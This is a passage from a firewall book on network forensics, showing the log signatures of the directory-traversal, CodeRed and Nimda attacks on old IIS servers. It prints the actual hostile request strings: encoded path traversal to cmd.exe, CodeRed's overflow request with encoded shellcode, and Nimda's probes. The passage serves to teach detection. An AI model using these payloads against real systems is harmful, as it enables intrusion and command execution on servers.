The Best Damn Firewall Book Period

At the scene of a crime, one of the first tasks of the forensic evidence technician is the gathering of fingerprints. These fingerprints can be used to determine the identity of the criminal. Just as in criminal forensics, network forensics technicians gather fingerprints at the scene of a computer crime. The fingerprints are extracted from the victim computer's log and are known as signatures or footprints. Almost all exploits have a unique signature. Let's look at the signatures of our three: Directory Traversal, CodeRed, and Nimda.

http://Victim.com/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir

Figure 4.4: Directory Traversal Footprint

/default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6805%ucbd3% u7801 etc.

Figure 4.5: CodeRed Footprint

GET /scripts/root.exe?/c+dir GET /c/winnt/system32/cmd.exe?/c+dir GET /d/ winnt/system32/cmd.exe?/c+dir GET /scripts/..%5c../..%5c../winnt/system32/cmd.exe?/c+dir GET /_mem_bin/..%5c….%5c../winnt/system32/cmd.exe?/c+dir GET /_vti_bin/..%5c….%5c../winnt/system32/cmd.exe?/c+dir

Figure 4.6: Nimda Footprint

Категории